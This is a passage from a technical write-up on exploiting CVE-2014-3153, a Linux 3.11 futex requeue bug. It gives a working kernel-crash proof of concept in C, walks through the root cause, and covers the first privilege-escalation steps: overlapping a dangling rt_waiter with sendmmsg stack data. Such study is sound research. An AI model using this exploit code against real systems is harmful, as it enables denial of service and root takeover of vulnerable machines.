<span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="o">!</span><span class="n">curval</span><span class="p">))</span>
<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">...</span>
</code></pre></div></div>
<p>The function attempts to <a href="https://wiki.osdev.org/Atomic_operation">atomically</a> compare-and-exchange the futex-word.
It compares it to <code class="language-plaintext highlighter-rouge">0</code> which is the value that signals the lock is free and exchanges it with the task’s PID.</p>
<p>This operation is <code class="language-plaintext highlighter-rouge">unlikely</code> to succeed because the user could’ve done it in userspace and avoid the expensive syscall,
therefore the assumption is that the user wasn’t able to retrieve the lock in userspace and needed the kernel’s “help”.
That’s why it would be a “surprise” in case it <em>was able</em> to get the lock.</p>
<p>Recalling the function above, if we successfully took control of the lock, we’d wake the top waiter,
which is the waiter that was added to the waiters list on the first requeue (step 3).<br />
Because we overwrote the value in userspace (step 4), the function <strong>succeeds and wakes the waiter</strong>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">ret</span> <span class="o">=</span> <span class="n">futex_lock_pi_atomic</span><span class="p">(</span><span class="n">pifutex</span><span class="p">,</span> <span class="n">hb2</span><span class="p">,</span> <span class="n">key2</span><span class="p">,</span> <span class="n">ps</span><span class="p">,</span> <span class="n">top_waiter</span><span class="o">-></span><span class="n">task</span><span class="p">,</span>
<span class="n">set_waiters</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span>
<span class="n">requeue_pi_wake_futex</span><span class="p">(</span><span class="n">top_waiter</span><span class="p">,</span> <span class="n">key2</span><span class="p">,</span> <span class="n">hb2</span><span class="p">);</span>
</code></pre></div></div>
<p>When <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L1264"><code class="language-plaintext highlighter-rouge">futex_requeue()</code></a> wakes up the waiter,
it sets the <code class="language-plaintext highlighter-rouge">rt_waiter</code> to <code class="language-plaintext highlighter-rouge">NULL</code> in order to signal <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L2285"><code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi()</code></a> that the atomic lock acquisition was successful.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span>
<span class="kt">void</span> <span class="nf">requeue_pi_wake_futex</span><span class="p">(</span><span class="k">struct</span> <span class="n">futex_q</span> <span class="o">*</span><span class="n">q</span><span class="p">,</span> <span class="k">union</span> <span class="n">futex_key</span> <span class="o">*</span><span class="n">key</span><span class="p">,</span>
<span class="k">struct</span> <span class="n">futex_hash_bucket</span> <span class="o">*</span><span class="n">hb</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">get_futex_key_refs</span><span class="p">(</span><span class="n">key</span><span class="p">);</span>
<span class="n">q</span><span class="o">-></span><span class="n">key</span> <span class="o">=</span> <span class="o">*</span><span class="n">key</span><span class="p">;</span>
<span class="n">__unqueue_futex</span><span class="p">(</span><span class="n">q</span><span class="p">);</span>
<span class="n">WARN_ON</span><span class="p">(</span><span class="o">!</span><span class="n">q</span><span class="o">-></span><span class="n">rt_waiter</span><span class="p">);</span>
<span class="n">q</span><span class="o">-></span><span class="n">rt_waiter</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> <span class="c1">// Right here.</span>
<span class="n">q</span><span class="o">-></span><span class="n">lock_ptr</span> <span class="o">=</span> <span class="o">&</span><span class="n">hb</span><span class="o">-></span><span class="n">lock</span><span class="p">;</span>
<span class="c1">// Start scheduling the task again.</span>
<span class="n">wake_up_state</span><span class="p">(</span><span class="n">q</span><span class="o">-></span><span class="n">task</span><span class="p">,</span> <span class="n">TASK_NORMAL</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Its usage is seen here within <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L2285"><code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi()</code></a>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* Check if the requeue code acquired the second futex for us. */</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">q</span><span class="p">.</span><span class="n">rt_waiter</span><span class="p">)</span> <span class="p">{</span>
<span class="cm">/*
* Got the lock. We might not be the anticipated owner if we
* did a lock-steal - fix up the PI-state in that case.
*/</span>
<span class="p">...</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="cm">/*
* We have been woken up by futex_unlock_pi(), a timeout, or a
* signal. futex_unlock_pi() will not destroy the lock_ptr nor
* the pi_state.
*/</span>
<span class="p">...</span>
<span class="c1">// Removes the waiter from the wait_list.</span>
<span class="n">ret</span> <span class="o">=</span> <span class="n">rt_mutex_finish_proxy_lock</span><span class="p">(</span><span class="n">pi_mutex</span><span class="p">,</span> <span class="n">to</span><span class="p">,</span> <span class="o">&</span><span class="n">rt_waiter</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
<span class="p">...</span>
<span class="cm">/* Unqueue and drop the lock. */</span>
<span class="n">unqueue_me_pi</span><span class="p">(</span><span class="o">&</span><span class="n">q</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>And as we can see, <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/rtmutex.c#L1033"><code class="language-plaintext highlighter-rouge">rt_mutex_finish_proxy_lock()</code></a> is <em>not</em> being called since <code class="language-plaintext highlighter-rouge">rt_waiter</code> is <code class="language-plaintext highlighter-rouge">NULL</code>,
and therefore the waiter is kept as-is within the waiters list.</p>
<h4 id="recap">Recap</h4>
<p>We start off by locking a PI-futex.
Then we simply requeue a thread to it which creates a waiter entry on the futex’s waiters list.
Afterwards, we overwrite the futex-word with <code class="language-plaintext highlighter-rouge">0</code>. Once we’ll requeue the waiting thread onto itself,
the attempt to atomically own the lock and wake the top waiter on the source (which is also the destination) futex succeeds.</p>
<p><img src="https://i.imgur.com/0qp366z.png" alt="Recap Image" /></p>
<p>This leaves us with a dangling waiter on the waiters list whose thread has continued and is up and running.
Now, the waiter entry points to garbage kernel stack memory. The original <code class="language-plaintext highlighter-rouge">rt_waiter</code> is long gone and was destroyed by other function calls on the stack.</p>
<p><img src="https://i.imgur.com/Dael9DR.png" alt="Bugged Waiter Image" /></p>
<p>Our waiter, a node in the waiters list, is now completely corrupted.</p>
<h1 id="building-the-kernel">Building The Kernel</h1>
<p>I won’t go too in depth as to how I built the kernel, since there are a milion of tutorials out there on how to do that.
I’d merely state that I’ve been using an 3.11.4-i386 kernel for this exploit that I compiled on a Xenial (Ubuntu 16.04) Docker container.</p>
<p>The only actual hassle was getting my hands on the right <code class="language-plaintext highlighter-rouge">gcc</code> version for the according kernel version that I worked on.
I compared the <a href="https://gcc.gnu.org/releases.html">GCC releases</a> with the <a href="https://en.wikipedia.org/wiki/Linux_kernel_version_history">Linux kernel version</a> history and tried various versions that seemed to fit by release date.
Ultimately <code class="language-plaintext highlighter-rouge">gcc-5</code> was what did the job for me.</p>
<p>It would be virtually impossible to do all of that without building your own kernel.<br />
The ability to debug the code and add your own logs within the code is indescribable.</p>
<p>For actually running the kernel, I’ve used QEMU as my emulator.</p>
<h1 id="exploitation">Exploitation</h1>
<p>Now’s the time for the actual fun.</p>
<p>Eventually, our goal would be to escalate to <code class="language-plaintext highlighter-rouge">root</code> privileges.<br />
The way we’d do that is by achieving arbitrary read & write within the kernel’s memory,
and then overwrite our process’ <a href="https://elixir.bootlin.com/linux/v3.11.4/source/include/linux/cred.h#L102"><code class="language-plaintext highlighter-rouge">cred</code></a> struct which dictates the security context of a task.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">cred</span> <span class="p">{</span>
<span class="n">atomic_t</span> <span class="n">usage</span><span class="p">;</span>
<span class="n">kuid_t</span> <span class="n">uid</span><span class="p">;</span> <span class="cm">/* real UID of the task */</span>
<span class="n">kgid_t</span> <span class="n">gid</span><span class="p">;</span> <span class="cm">/* real GID of the task */</span>
<span class="n">kuid_t</span> <span class="n">suid</span><span class="p">;</span> <span class="cm">/* saved UID of the task */</span>
<span class="n">kgid_t</span> <span class="n">sgid</span><span class="p">;</span> <span class="cm">/* saved GID of the task */</span>
<span class="n">kuid_t</span> <span class="n">euid</span><span class="p">;</span> <span class="cm">/* effective UID of the task */</span>
<span class="n">kgid_t</span> <span class="n">egid</span><span class="p">;</span> <span class="cm">/* effective GID of the task */</span>
<span class="n">kuid_t</span> <span class="n">fsuid</span><span class="p">;</span> <span class="cm">/* UID for VFS ops */</span>
<span class="n">kgid_t</span> <span class="n">fsgid</span><span class="p">;</span> <span class="cm">/* GID for VFS ops */</span>
<span class="kt">unsigned</span> <span class="n">securebits</span><span class="p">;</span> <span class="cm">/* SUID-less security management */</span>
<span class="n">kernel_cap_t</span> <span class="n">cap_inheritable</span><span class="p">;</span> <span class="cm">/* caps our children can inherit */</span>
<span class="n">kernel_cap_t</span> <span class="n">cap_permitted</span><span class="p">;</span> <span class="cm">/* caps we're permitted */</span>
<span class="n">kernel_cap_t</span> <span class="n">cap_effective</span><span class="p">;</span> <span class="cm">/* caps we can actually use */</span>
<span class="n">kernel_cap_t</span> <span class="n">cap_bset</span><span class="p">;</span> <span class="cm">/* capability bounding set */</span>
<span class="n">kernel_cap_t</span> <span class="n">cap_ambient</span><span class="p">;</span> <span class="cm">/* Ambient capability set */</span>
<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The most fundamental members of <code class="language-plaintext highlighter-rouge">cred</code> are presumably the real <code class="language-plaintext highlighter-rouge">uid</code> and <code class="language-plaintext highlighter-rouge">gid</code>,
but it also stores other properties such as the task’s <a href="https://man7.org/linux/man-pages/man7/capabilities.7.html">capabilities</a> and many other.</p>
<p>Although how would we go about it by solely having a wild reference to that waiter?<br />
Quite frankly, the idea is fairly simple. There’s nothing new about corrupting a node within a linked list in order to gain read and write capabilities.
Same applies here. We’d need to find a way to write to that dangling waiter,
and then perform certain operations on it so that the kernel would do as we please.</p>
<h4 id="kernel-crash">Kernel Crash</h4>
<p>But let’s start small. For now we’ll just attempt to crash the kernel.</p>
<p>I wrote a program that implements the steps that we listed above.<br />
Let’s analyze it before going into the actual exploitation.
Here’s the <a href="https://github.com/elongl/CVE-2014-3153/blob/master/kernel_crash.c">code</a>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define CRASH_SEC 3
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">pid_t</span> <span class="n">pid</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="o">*</span><span class="n">futexes</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="o">*</span><span class="n">non_pi_futex</span><span class="p">,</span> <span class="o">*</span><span class="n">pi_futex</span><span class="p">;</span>
<span class="n">assert</span><span class="p">((</span><span class="n">futexes</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">uint32_t</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_SHARED</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">))</span> <span class="o">></span> <span class="mi">0</span><span class="p">);</span>
<span class="n">non_pi_futex</span> <span class="o">=</span> <span class="o">&</span><span class="n">futexes</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">pi_futex</span> <span class="o">=</span> <span class="o">&</span><span class="n">futexes</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
<span class="n">flock</span><span class="p">(</span><span class="n">pi_futex</span><span class="p">);</span>
<span class="n">assert</span><span class="p">((</span><span class="n">pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">())</span> <span class="o">!=</span> <span class="o">-</span><span class="mi">1</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">pid</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fwait_requeue</span><span class="p">(</span><span class="n">non_pi_futex</span><span class="p">,</span> <span class="n">pi_futex</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"Child continues."</span><span class="p">);</span>
<span class="n">exit</span><span class="p">(</span><span class="n">EXIT_SUCCESS</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Kernel will crash in %u seconds...</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">CRASH_SEC</span><span class="p">);</span>
<span class="n">sleep</span><span class="p">(</span><span class="n">CRASH_SEC</span><span class="p">);</span>
<span class="n">frequeue</span><span class="p">(</span><span class="n">non_pi_futex</span><span class="p">,</span> <span class="n">pi_futex</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="o">*</span><span class="n">pi_futex</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">frequeue</span><span class="p">(</span><span class="n">pi_futex</span><span class="p">,</span> <span class="n">pi_futex</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">wait</span><span class="p">(</span><span class="nb">NULL</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">flock</code>, <code class="language-plaintext highlighter-rouge">fwait_requeue</code>, and the <code class="language-plaintext highlighter-rouge">frequeue</code> functions are implemented in a small <a href="https://github.com/elongl/CVE-2014-3153/blob/master/futex.c">futex wrappers</a> file that I’ve created for simplification and ease on the eyes.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">futexes</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">uint32_t</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_SHARED</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
</code></pre></div></div>
<p>We start off by allocating <code class="language-plaintext highlighter-rouge">sizeof(uint32_t) * 2</code> of R/W memory which is our two futexes.<br />
Mind the <code class="language-plaintext highlighter-rouge">MAP_SHARED</code> flag that is being passed to <code class="language-plaintext highlighter-rouge">mmap</code> call in order to signal that the memory
needs to be shared among the main process and the process that is spawned from the <code class="language-plaintext highlighter-rouge">fork()</code> call.</p>
<p><em>Side-comment</em>: In the actual exploit you’d see that I’m using <code class="language-plaintext highlighter-rouge">pthreads</code> rather than <code class="language-plaintext highlighter-rouge">fork()</code> which makes the code much clearer,
and there’s no need to map a shared address space since all threads point to the same virtual address space.</p>
<ol>
<li>
<p>Locking the <code class="language-plaintext highlighter-rouge">pi_futex</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">flock</span><span class="p">(</span><span class="n">pi_futex</span><span class="p">)</span>
</code></pre></div> </div>
</li>
<li>
<p>Spawn a child process and call <code class="language-plaintext highlighter-rouge">FUTEX_WAIT_REQUEUE_PI</code> from <code class="language-plaintext highlighter-rouge">non_pi_futex</code> to <code class="language-plaintext highlighter-rouge">pi_futex</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">assert</span><span class="p">((</span><span class="n">pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">())</span> <span class="o">!=</span> <span class="o">-</span><span class="mi">1</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">pid</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fwait_requeue</span><span class="p">(</span><span class="n">non_pi_futex</span><span class="p">,</span> <span class="n">pi_futex</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"Child continues."</span><span class="p">);</span>
<span class="n">exit</span><span class="p">(</span><span class="n">EXIT_SUCCESS</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div> </div>
</li>
<li>
<p>We only <code class="language-plaintext highlighter-rouge">sleep</code> to assure that the <code class="language-plaintext highlighter-rouge">fwait_requeue</code> of the child process had already been issued.
Afterwards, we requeue the waiter to the <code class="language-plaintext highlighter-rouge">pi_futex</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>```c
sleep(CRASH_SEC);
frequeue(non_pi_futex, pi_futex, 1, 0);
```
</code></pre></div> </div>
</li>
<li>
<p>Overwrite the userspace value of the <code class="language-plaintext highlighter-rouge">pi_futex</code> to <code class="language-plaintext highlighter-rouge">0</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">*</span><span class="n">pi_futex</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</code></pre></div> </div>
</li>
<li>
<p>Self-requeue.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">frequeue</span><span class="p">(</span><span class="n">pi_futex</span><span class="p">,</span> <span class="n">pi_futex</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</code></pre></div> </div>
</li>
</ol>
<p>Now let’s see this in action.</p>
<center><iframe style="width: 720px; height: 400px; margin: 0.5rem" src="https://www.youtube.com/embed/DxPt1MNPDpY" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen=""></iframe></center>
<p>If you paid attention to the call trace,
you would spot that the kernel crashes once the process itself terminates (<code class="language-plaintext highlighter-rouge">do_exit</code>).
What happens is that the kernel attempts to cleanup the process’ resources (<code class="language-plaintext highlighter-rouge">mm_release</code>), specifically the PI state list (<code class="language-plaintext highlighter-rouge">exit_pi_state_list</code>),
and when it attempts to do so, it unlocks all the futexes that the process holds.
During the process of releasing them, the kernel tries to unlock our corrupted waiter as well which causes a crash.</p>
<p>To be more accurate, it occurs here.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="k">struct</span> <span class="n">rt_mutex_waiter</span> <span class="o">*</span>
<span class="nf">rt_mutex_top_waiter</span><span class="p">(</span><span class="k">struct</span> <span class="n">rt_mutex</span> <span class="o">*</span><span class="n">lock</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">struct</span> <span class="n">rt_mutex_waiter</span> <span class="o">*</span><span class="n">w</span><span class="p">;</span>
<span class="n">w</span> <span class="o">=</span> <span class="n">plist_first_entry</span><span class="p">(</span><span class="o">&</span><span class="n">lock</span><span class="o">-></span><span class="n">wait_list</span><span class="p">,</span> <span class="k">struct</span> <span class="n">rt_mutex_waiter</span><span class="p">,</span>
<span class="n">list_entry</span><span class="p">);</span>
<span class="n">BUG_ON</span><span class="p">(</span><span class="n">w</span><span class="o">-></span><span class="n">lock</span> <span class="o">!=</span> <span class="n">lock</span><span class="p">);</span> <span class="c1">// <-- KERNEL BUG</span>
<span class="k">return</span> <span class="n">w</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The function compares the lock that the top waiter claims it waits on to the actual lock.
Because the waiter is completely bugged,
it’s <code class="language-plaintext highlighter-rouge">lock</code> member no longer points to the relating <code class="language-plaintext highlighter-rouge">rt_mutex</code> and therefore causes a crash.</p>
<h1 id="privilege-escalation">Privilege Escalation</h1>
<p>DOSing the system is pretty cool, but let’s make it more interesting by escalating to <code class="language-plaintext highlighter-rouge">root</code> privileges.</p>
<p>I intentionally do not post the entire exploit in advance because that would most likely be too overwhelming.
Instead, I’ll append code blocks by stages.<br />
If you do prefer to have the entire exploit available in hand, it can be found <a href="https://github.com/elongl/CVE-2014-3153/blob/master/privilege_escalation.c">here</a>.</p>
<h4 id="writing-to-the-waiter">Writing To The Waiter</h4>
<p>In order to make use of our dangling waiter, we’d first need to find a way to write to it.<br />
A quick reminder, our waiter is placed on the kernel stack.
With that in mind, we need to somehow be able to write a controlled buffer to the place the waiter was held within the stack.
Given that we’re just a userspace program, our way of writing data to the kernel’s stack is by issuing System Calls.</p>
<p>But how do we know which syscall to invoke?<br />
Luckily for us, the kernel comes with a useful tool called <code class="language-plaintext highlighter-rouge">checkstack</code>.<br />
It can be found within the source under <code class="language-plaintext highlighter-rouge">scripts/checkstack.pl</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ objdump -d vmlinux | ./scripts/checkstack.pl i386 | grep -E "(futex_wait_requeue_pi|sys)"
0xc11206e6 do_sys_poll [vmlinux]: 932
0xc1120aa3 do_sys_poll [vmlinux]: 932
...
0xc1527388 ___sys_sendmsg [vmlinux]: 248
0xc15274d8 ___sys_sendmsg [vmlinux]: 248
0xc1527b1a ___sys_recvmsg [vmlinux]: 220
0xc1527c6b ___sys_recvmsg [vmlinux]: 220
0xc1087936 futex_wait_requeue_pi.constprop.21 [vmlinux]:212
0xc1087a80 futex_wait_requeue_pi.constprop.21 [vmlinux]:212
0xc1529828 __sys_sendmmsg [vmlinux]: 184
0xc15298fe __sys_sendmmsg [vmlinux]: 184
...
</code></pre></div></div>
<p>The script lists the stack depth, size of stack frame, of each function within the kernel.
This would help us in estimating which syscall we should use in order to write to the waiter’s address space.</p>
<p>We enforce two limitations on the system call we’re looking for.</p>
<ol>
<li>It is deep enough in order to overlap with our dangling <code class="language-plaintext highlighter-rouge">rt_waiter</code>.</li>
<li>The local variable within the function that overlaps <code class="language-plaintext highlighter-rouge">rt_waiter</code> is controllable.</li>
</ol>
<p>The syscalls <code class="language-plaintext highlighter-rouge">sendmsg</code>, <code class="language-plaintext highlighter-rouge">recvmsg</code>, and <code class="language-plaintext highlighter-rouge">sendmmsg</code> are the adjacent functions to <code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi</code> in terms of stack usage.<br />
That should be a good place to start.
We’ll be using <code class="language-plaintext highlighter-rouge">sendmmsg</code> throughout the exploit.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Breakpoint 1, futex_wait_requeue_pi (uaddr=uaddr@entry=0x80ff44c, flags=flags@entry=0x1, val=val@entry=0x0,
abs_time=abs_time@entry=0x0, uaddr2=uaddr2@entry=0x80ff450, bitset=0xffffffff) at kernel/futex.c:2285
(gdb) set $waiter = &rt_waiter
Breakpoint 2, ___sys_sendmsg (sock=sock@entry=0xc5dfea80, msg=msg@entry=0x80ff420, msg_sys=msg_sys@entry=0xc78cbef4,
flags=flags@entry=0x0, used_address=used_address@entry=0xc78cbf10) at net/socket.c:1979
(gdb) p $waiter
$12 = (struct rt_mutex_waiter *) 0xc78cbe2c
(gdb) p &iovstack
$11 = (struct iovec (*)[8]) 0xc78cbe08
(gdb) p sizeof(iovstack)
$13 = 0x40
(gdb) p &iovstack < $waiter < (char*)&iovstack + sizeof(iovstack)
$14 = 0x1 (True)
</code></pre></div></div>
<p>I set two breakpoints, at <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L2285"><code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi()</code></a> and <a href="https://elixir.bootlin.com/linux/v3.11.4/source/net/socket.c#L1976"><code class="language-plaintext highlighter-rouge">___sys_sendmsg()</code></a> in order to understand what arguments should we pass to the <code class="language-plaintext highlighter-rouge">sendmmsg</code> syscall
so that <code class="language-plaintext highlighter-rouge">rt_waiter</code> is under our control.</p>
<p>When the breakpoint hits on <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L2285"><code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi()</code></a>, I do nothing besides storing the address of <code class="language-plaintext highlighter-rouge">rt_waiter</code> in <code class="language-plaintext highlighter-rouge">$waiter</code>.
When it hits on <a href="https://elixir.bootlin.com/linux/v3.11.4/source/net/socket.c#L1976"><code class="language-plaintext highlighter-rouge">___sys_sendmsg()</code></a>, I check for the address of the local variable <code class="language-plaintext highlighter-rouge">iovstack</code>, which is of type <code class="language-plaintext highlighter-rouge">struct iovec[8]</code>, and examine its size.</p>
<table>
<tbody>
<tr>
<td><strong>Variable</strong></td>
<td><strong>Address</strong></td>
</tr>
<tr>
<td><code class="language-plaintext highlighter-rouge">rt_waiter</code></td>
<td><code class="language-plaintext highlighter-rouge">0xc78cbe2c</code></td>
</tr>
<tr>
<td><code class="language-plaintext highlighter-rouge">iovstack</code></td>
<td><code class="language-plaintext highlighter-rouge">0xc78cbe08</code> - <code class="language-plaintext highlighter-rouge">0xc78cbe48</code></td>
</tr>
</tbody>
</table>
<p>Proved <code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi:rt_waiter</code> overlaps with <code class="language-plaintext highlighter-rouge">___sys_sendmsg:iovstack</code>.</p>
<p>Let’s take a look at <code class="language-plaintext highlighter-rouge">sendmmsg</code>’s signature.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">sendmmsg</span><span class="p">(</span><span class="kt">int</span> <span class="n">sockfd</span><span class="p">,</span> <span class="k">struct</span> <span class="n">mmsghdr</span> <span class="o">*</span><span class="n">msgvec</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">vlen</span><span class="p">,</span>
<span class="kt">int</span> <span class="n">flags</span><span class="p">);</span>
<span class="k">struct</span> <span class="n">mmsghdr</span>
<span class="p">{</span>
<span class="k">struct</span> <span class="n">msghdr</span> <span class="n">msg_hdr</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">msg_len</span><span class="p">;</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="n">msghdr</span>
<span class="p">{</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">msg_name</span><span class="p">;</span>
<span class="n">socklen_t</span> <span class="n">msg_namelen</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">iovec</span> <span class="o">*</span><span class="n">msg_iov</span><span class="p">;</span> <span class="c1">// <-- iovstack</span>
<span class="kt">size_t</span> <span class="n">msg_iovlen</span><span class="p">;</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">msg_control</span><span class="p">;</span>
<span class="kt">size_t</span> <span class="n">msg_controllen</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">msg_flags</span><span class="p">;</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="n">iovec</span>
<span class="p">{</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">iov_base</span><span class="p">;</span>
<span class="kt">size_t</span> <span class="n">iov_len</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>At this point I suggest understanding the syscall itself.</p>
<blockquote>
<p>The sendmmsg() system call is an extension of sendmsg(2) that
allows the caller to transmit multiple messages on a socket using
a single system call. (This has performance benefits for some
applications.)</p>
</blockquote>
<p>The arguments are pretty trivial and essentially the same as <code class="language-plaintext highlighter-rouge">sendmsg</code> only that there’s <code class="language-plaintext highlighter-rouge">mmsghdr</code> that can contain multiple <code class="language-plaintext highlighter-rouge">msghdr</code>.<br />
If you’re unfamiliar with the syscall, give it a read at <a href="https://man7.org/linux/man-pages/man2/sendmmsg.2.html"><code class="language-plaintext highlighter-rouge">man sendmmsg(2)</code></a>.</p>
<p>In order to invoke <code class="language-plaintext highlighter-rouge">sendmmsg</code> successfully, we’d need a pair of connected sockets that we can send the data to.
It is very important to understand that we want <a href="https://elixir.bootlin.com/linux/v3.11.4/source/net/socket.c#L1976"><code class="language-plaintext highlighter-rouge">___sys_sendmsg()</code></a> to <strong>block</strong> so that we can take advantage of the waiter’s corrupted state while it’s under our control.</p>
<p>Typically, the function sends the data over the socket and exits.
In order to make it block, we’d need to use <code class="language-plaintext highlighter-rouge">SOCK_STREAM</code> as our socket type which provides a <em>reliable connection-based</em> byte stream.
This grants us the blocking capabilities we’ve talked about.
On top of that, we’d need to fill up the “send buffer” so that data can’t be sent over the socket, unless data is read on the other end.</p>
<p>I’ve crafted a function that does just that.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define BLOCKBUF "AAAAAAAA"
#define BLOCKBUFLEN strlen(BLOCKBUF)
</span>
<span class="kt">int</span> <span class="n">client_sockfd</span><span class="p">,</span> <span class="n">server_sockfd</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">setup_sockets</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">fds</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
<span class="n">puts</span><span class="p">(</span><span class="n">USERLOG</span> <span class="s">"Creating a pair of sockets for kernel stack modification using blocking I/O."</span><span class="p">);</span>
<span class="n">assert</span><span class="p">(</span><span class="o">!</span><span class="n">socketpair</span><span class="p">(</span><span class="n">AF_UNIX</span><span class="p">,</span> <span class="n">SOCK_STREAM</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">fds</span><span class="p">));</span>
<span class="n">client_sockfd</span> <span class="o">=</span> <span class="n">fds</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
